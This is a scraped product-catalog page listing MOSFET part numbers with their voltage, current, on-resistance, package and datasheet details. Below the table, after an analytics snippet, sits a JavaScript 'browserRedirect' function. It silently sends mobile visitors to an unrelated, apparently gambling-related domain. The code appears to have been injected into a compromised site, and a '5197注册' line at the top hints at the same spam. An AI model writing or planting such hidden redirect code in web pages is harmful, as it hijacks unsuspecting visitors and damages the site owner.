5197注册

  • EN

MOSFET

Part Number Configuration Type ESD Drain-Source Voltage(V) Gate-Source Voltage(V) Gate-Threshold Voltage, VGS(th)(V) Continuous Drain Current, ID(A) Static Drain-Source On-Resistance RDS(ON) (mΩ) Max. at VGS= Power Dissipation Package download
VDS VGS Min. Max. TA=25℃ TA=70℃ Tc=25℃ Tc=100℃ 10V 4.5V 2.5V 1.8V 1.5V PD(W)
YS3912ZBB Single N No 30 ±20 1.2 2.5 - - 25 16 18 28 - - - 21 PPAK3X3 YS3912ZBB_REV.02_20200522.pdf
YS3913S Single P No -30 ±20 -1.2 -2.2 - - -4 -2.5 75 130 - - - 1.56 SOT-23 YS3913S_REV.02_20200522.pdf
YS3915S Single P No -30 ±20 -1.2 -2.2 -3.3 -2.64 - - 90 140 - - - 1.56 SOT-23 YS3915S_REV.02_20200522.pdf
YS4228M Dual N+N No 30 ±20 1 2.5 8.9 7.1 - - 18 26 - - - 2.1 SOP-8 YS4228M_REV.02_20200522.pdf
YS42P03BB Single P No -30 ±20 -1 -2.5 - - -42 -27 15 25 - - - 37 PPAK3X3 YS42P03BB_REV.02_20200522.pdf
YS4435AM Single P No -30 ±20 -1 -2.5 -7.5 -5.8 - - 20 32 - - - 2.5 SOP-8 YS4435AM_REV.02_20200522.pdf
YS4503M Dual N+P No 30 ±20 1 3 6.9 5.5 - - 25 30 - - - 1.5 SOP-8 YS4503M_REV.02_20200522.pdf
YS4503M Dual N+P No -30 ±20 -1 -3 -6.3 -5 - - 36 45 - - - 1.5 SOP-8 YS4503M_REV.02_20200522.pdf
YS46N03BB Single N No 30 ±20 1 2.5 11 8.7 46 29 9 13.5 - - - 29 PPAK3X3 YS46N03BB_REV.02_20200522.pdf
YS4812 Single N No 30 ±20 1 3 6 - - - 38 52 - - - 1.4 SOT-23 YS4812_REV.03_20200522.pdf
YS4903ZBB Single P No -40 ±20 -1 -2.5 - - -38 -24 14 21 - - - 52 PPAK3X3 YS4903ZBB_REV.02_20200522.pdf
YS4904ZBB Single N No 40 ±20 1 2.5 - - 70 44.3 5.5 7 - - - 52 PPAK3X3 YS4904ZBB_REV.02_20200522.pdf
YS4906ZBB Single N No 40 ±20 1.2 2.5 - - 35 22.1 9 13.5 - - - 44 PPAK3X3 YS4906ZBB_REV.02_20200522.pdf
YS4911S Single P No -40 ±20 -1 -2.5 -2.9 -2.32 - - 68 100 - - - 1 SOT-23 YS4911S_REV.02_20200522.pdf
YS4953M Dual P+P No -30 ±20 -1 -2.5 -6 -4 - - 45 82 - - - 1.5 SOP-8 YS4953M_REV.02_20200522.pdf
YS4964ZBB Single N No 40 ±20 1.2 2.5 - - 54 34.1 6(typ) 11(typ) - - - 52 PPAK3X3 YS4964ZBB_REV.01 20210628.pdf
YS4N65D Single N No 650 ±30 2 4 - - 4 - 2400 - - - - 50 TO-252 YS4N65_REV.02_20200507.pdf
YS4N65F Single N No 650 ±30 2 4 - - 4 - 2400 - - - - 35 TO-220F YS4N65_REV.02_20200507.pdf
YS4N65H Single N No 650 ±30 2 4 - - 4 - 2400 - - - - 106 TO-263 YS4N65_REV.02_20200507.pdf
YS4N65J Single N No 650 ±30 2 4 - - 4 - 2400 - - - - 106 TO-262 YS4N65_REV.02_20200507.pdf
var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();